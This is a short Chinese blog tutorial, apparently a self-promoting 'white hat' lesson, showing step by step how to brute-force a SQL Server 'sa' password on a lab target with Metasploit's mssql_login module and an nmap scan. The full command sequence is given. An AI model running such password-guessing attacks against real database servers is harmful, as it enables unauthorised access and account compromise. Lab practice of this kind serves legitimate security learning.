白帽***教你Kali Linux：数据库密码脆弱性***演练中

一、课前声明
1、本分享仅做学习交流，请自觉遵守法律法规！
2、搜索：Kali 与编程，学习更多网络***干货！
3、Kali 与编程每天准时更新，敬请学习和关注！
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.搭建好Sql server的靶机一个；
3.整装待发的小白一个。
三、战略安排
3.1 以静默方式进入Metasploit（msf）***框架，如下图所示。
命令：msfconsole -q

3.2 检索暴力破解Mysql服务的漏洞利用模块，如下图所示。
命令：search mssql_login

3.3 利用检索到的漏洞利用模块，如下图所示。
命令：use auxiliary/scanner/mssql/mssql_login

3.4 查看漏洞利用模块的参数，如下图所示。
命令：show options

3.5 设置参数，如下图所示。
3.5.1 命令：set username sa

3.5.2 设置密码文件，如下图所示。
命令：set pass_file 路径
例子：set pass_file /root/passwd.txt

3.5.3 设置***线程，如下图所示。
命令：set threads 5
3.5.4 查看目标主机的IP地址
命令：ipconfig
3.5.5 设置目标主机的IP，如下图所示。
命令：set rhosts 192.168.0.102

3.6 在Kali***者主机新建终端利用“nmap”工具对目标主机进行扫描，如下图所示。
命令：nmap -sV 192.168.0.102

3.7 设置目标主机***端口，如下图所示。
命令：set rport 49156

3.8 运行***模式，如下图所示。
命令：run
如下图所示，绿色代码表示爆破成功。

小编一个个字敲打创作，可辛苦了，问君可否关注一下呢？你还可搜索:Kali与编程，学习更多呢 ！
点我学习更多Kali Linux***测试与网络***实战技巧！